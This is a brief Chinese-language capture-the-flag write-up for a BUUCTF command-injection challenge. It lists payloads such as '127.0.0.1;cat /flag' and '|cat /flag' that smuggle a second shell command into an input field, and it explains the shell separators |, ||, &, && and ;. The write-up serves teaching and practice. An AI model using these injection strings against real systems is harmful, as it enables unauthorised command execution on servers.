BUUCTF_Web_[ACTF2020 新生赛]Exec
首先打开靶机
可以看出,这是一道有关命令执行的题
根据经验,可以尝试127.0.0.1;cat /flag
;cat /flag
127.0.0.1|cat /flag
|cat /flag
127.0.0.1||cat /flag
||cat /flag
127.0.0.1&cat /flag
&cat /flag
以上命令均可查询到flag
没有过滤的题,可以利用常见的管道命令符执行
-
|(按位或),直接执行|后面的语句
-
||(逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
-
&(按位与),&前面和后面命令都要执行,无论前面真假
-
&&(逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令
-
; 前后都执行,无论前面真假,同&,(linux也有)